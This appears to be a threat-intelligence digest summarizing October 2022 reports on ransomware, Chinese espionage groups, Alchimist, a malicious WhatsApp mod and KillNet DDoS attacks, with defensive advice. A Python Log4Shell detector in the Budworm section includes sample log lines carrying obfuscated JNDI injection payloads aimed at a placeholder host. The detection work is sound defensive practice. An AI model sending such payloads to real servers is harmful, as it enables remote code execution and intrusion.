Ransom Cartel Ransomware: A Possible Connection With REvil

(published: October 14, 2022)

Background:

Palo Alto Networks researchers analyzed Ransom Cartel, a double extortion ransomware-as-a-service group. Ransom Cartel came into existence in mid-December 2021 after the REvil group shut down. The Ransom Cartel group uses the Ransom Cartel ransomware, which shares significant code similarities with REvil, indicating close connections, but lacks REvil's obfuscation engine capabilities.

Ransom Cartel uses almost no obfuscation outside of its configuration: unlike REvil, it does not use string encryption or API hashing. Among the multiple tools used by Ransom Cartel, the DonPAPI credential dumper is unique to this group. It dumps Windows Data Protection API (DPAPI) secrets, targeting DPAPI-protected credentials such as credentials saved in web browsers, RDP passwords, and Wi-Fi keys.

Takeaway:

Network defenders should consider monitoring or blocking high-risk connections such as TOR traffic, which is often abused by Ransom Cartel and its affiliates. It is crucial that your company ensures that servers are always running the most current software version. Your company should have policies in place regarding the configurations your servers need in order to conduct business safely.

Budworm: Espionage Group Returns to Targeting U.S. Organizations

(published: October 13, 2022)

Background:

Six to eight years ago, the China-sponsored group Emissary Panda (aka APT27, Budworm, TG-3390) was heavily targeting US organizations. It later stopped targeting the US and focused largely on Asia, Europe, and the Middle East. Over the past six months, the group has returned to targeting the US (a US state legislature) and has attacked the government of a Middle Eastern country as well as a multinational electronics manufacturer.

These recent attacks started by exploiting the Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) in the Apache Tomcat service on servers in order to install web shells. The attackers abused the CyberArk Viewfinity software for DLL side-loading to install various malware and tools, including their custom HyperBro backdoor, the PlugX backdoor, and a number of commodity tools (Cobalt Strike, Fast Reverse Proxy (FRP), the Fscan intranet scanning tool, the IOX proxy and port-forwarding tool, and the LaZagne credential dumping tool).
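A defender-side check for the Log4j exploitation path mentioned above, added here as an example and not part of the report summarized in this digest: it runs over constructed Tomcat access-log lines, undoes URL encoding and the lookup obfuscation that Log4j 2 itself resolves before the JNDI step (case-changing lookups and default values), and reports the JNDI protocol per hit. The client IPs and the c2.invalid hostname are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat access-log lines (common log format plus referer and
# user agent); not taken from the report. Lines 2-4 carry JNDI lookups with
# increasing obfuscation, the others are benign.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [13/Oct/2022:10:01:02 +0000] "GET /manager/html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Oct/2022:10:01:09 +0000] "GET /index.jsp?q=${jndi:ldap://c2.invalid/a} HTTP/1.1" 200 312 "-" "curl/7.8"
203.0.113.9 - - [13/Oct/2022:10:01:15 +0000] "GET / HTTP/1.1" 200 900 "-" "${${lower:j}${lower:n}${::-d}i:rmi://c2.invalid/x}"
203.0.113.9 - - [13/Oct/2022:10:02:40 +0000] "GET /%24%7B%24%7Benv:NaN:-j%7Dndi:dns://c2.invalid%7D HTTP/1.1" 404 0 "-" "-"
203.0.113.11 - - [13/Oct/2022:10:03:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# A ${...} lookup with no further lookup nested inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

def _fold(match):
    """Resolve one innermost lookup the way Log4j 2 would before the JNDI step."""
    body = match.group(1)
    head, _, rest = body.partition(":")
    if head.lower() in ("lower", "upper"):   # ${lower:j} -> j
        return rest
    if ":-" in body:                         # ${env:NaN:-j} or ${::-d} -> default value
        return body.rsplit(":-", 1)[1]
    return "{" + body + "}"                  # unresolvable: mark it so the parent is seen next

def normalize_lookups(text, max_rounds=32):
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        folded = INNER_LOOKUP.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text.lower()

JNDI_HIT = re.compile(r"\{jndi:([a-z]+):")  # a folded JNDI lookup and its protocol

def find_log4shell(lines):
    """Return one record per access-log line that carries a JNDI lookup."""
    hits = []
    for raw in lines:
        m = JNDI_HIT.search(normalize_lookups(raw))
        if m:
            hits.append({"client": raw.split(" ", 1)[0],
                         "protocol": m.group(1), "line": raw})
    return hits
```

Run find_log4shell over the sample to see three hits (ldap, rmi, dns); feeding it real access logs only requires the same line format.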

Takeaway:

Keep operating systems updated. Establish a baseline of normal activity so that the unauthorized introduction of abused software can be detected.

Alchimist: A New Attack Framework in Chinese for Mac, Linux and Windows

(published: October 13, 2022)

Background:

Talos researchers have discovered a new attack framework dubbed Alchimist. It is a standalone Go-based executable that carries the implants and the whole web user interface, which is written in simplified Chinese. Alchimist targets Windows, Linux, and macOS systems. It uses the Insekt RAT to target Windows and Linux. Alchimist's macOS exploitation is based on a Mach-O dropper file that contains a CVE-2021-4034 privilege escalation exploit and a bind shell backdoor. Alchimist can use one of three protocols for C2 communication: regular TLS, Server Name Indication (SNI), or WebSocket Secure/WebSocket (WSS/WS).

Takeaway:

Attack frameworks such as Alchimist are easy-to-use off-the-shelf tools that can be abused by a wide range of attackers.

Magniber Ransomware Adopts JavaScript, Targeting Home Users with Fake Software Updates

(published: October 13, 2022)

Background:

HP researchers described a new ransomware dubbed Magniber. It is a single-client ransomware (it focuses on home users), so it targets only Windows 10 and newer and relies on users having administrative privileges. Since September 2022, Magniber has spread via ZIP files containing a JavaScript file that purports to be an antivirus or Windows update. Magniber uses the DotNetToJScript technique to run a .NET executable purely in memory. For additional detection evasion, it bypasses User Account Control (UAC) and uses syscalls instead of the standard Windows API libraries.

Takeaway:

If you think your system needs an update, use the official update channel. Configure your everyday account as a standard user account and use an administrative account only when needed.

WIP19 Espionage | New Chinese APT Targets IT Service Providers and Telcos With Signed Malware

(published: October 12, 2022)

Background:

SentinelOne researchers detected new China-sponsored cyberespionage activity dubbed WIP19. This activity was targeting IT service and telecommunications providers in Asia and the Middle East. A portion of WIP19's tools were authored by WinEggDrop, a Chinese-speaking malware author who has created tools for a variety of groups, such as Operation Shadow Force. WinEggDrop has been active since 2014, and the version of its SQLMaggie backdoor used by WIP19 carries a 2019 timestamp. WIP19 has been signing its malware with a certificate stolen from the Korean company DEEPSoft. The attackers avoided stable C2 infrastructure and completed their operations in a "hands-on keyboard" fashion, during interactive sessions with compromised machines.

Takeaway:

Telecommunications companies should include likely cyberespionage attacks in their threat model. Defense-in-depth is an effective way to help mitigate potential APT activity. Defense-in-depth involves the layering of defense mechanisms. This can include network and endpoint security, social engineering training for staff (such as training exercises to help detect phishing emails), and robust threat intelligence capabilities.

Malicious WhatsApp Mod Distributed Through Legitimate Apps

(published: October 12, 2022)

Background:

Kaspersky researchers detected a new malicious modified build (mod) of WhatsApp named YoWhatsApp (WhatsApp Plus). This malicious mod reached users through other legitimate applications: either through an ad in the Snaptube app or through the Vidmate app's internal store. The infected build of YoWhatsApp is a fully working messenger, but it comes with a malicious module that decrypts and launches the main payload, the Triada trojan. Infected users can lose control over their WhatsApp account, be signed up for paid subscriptions, and end up distributing malicious spam.

Takeaway:

Application owners should vet the code they offer in their internal stores or via internal advertising. Android users should consider limiting the number of installed apps to those necessary and/or installing antivirus software on their device. Before adding an application, check its developer information, popularity, and reviews.

US Airports Taken Down in DDoS Attacks by Pro-Russian Hackers

(published: October 10, 2022)

Background:

On October 10, 2022, Russia-based hacktivist group KillNet attacked websites of several major airports in the US with distributed denial-of-service (DDoS). The attack affected public-facing websites of the Los Angeles International Airport (LAX), Hartsfield-Jackson Atlanta International Airport (ATL), Chicago O’Hare International Airport (ORD), as well as smaller airports in Arizona, Colorado, Florida, Hawaii, Kentucky, and Mississippi.

Takeaway:

This DDoS attack came on the same day that Russia escalated its kinetic actions in Ukraine with major rocket and drone strikes targeting Ukrainian cities. Hacktivist groups tend to use DDoS attacks as their main vector against businesses and government entities they are not happy with. Denial-of-service attacks can cost your company revenue, because severe attacks can shut down online services for extended periods of time. Organizations should implement DDoS protection measures and put a business continuity plan in place in the unfortunate case that your company becomes the target of a significant DDoS attack.

Observed Threats

KillNet

KillNet is a Russia-affiliated hacktivist group specializing in distributed denial of service (DDoS) attacks. It was originally created on the basis of a Russian-speaking DDoS-for-hire group with the same name. On February 26, 2022, KillNet formed an Anonymous-like collective to wage war on Anonymous (a loosely affiliated group of volunteer hacktivists), Ukraine, and countries that support Ukraine in a way hostile to Russia. The group united with other threat groups (XakNet Team) and with DDoS actors and services such as Stresser[.]tech. KillNet's most popular channel on the Telegram messenger had over 90,000 subscribers.
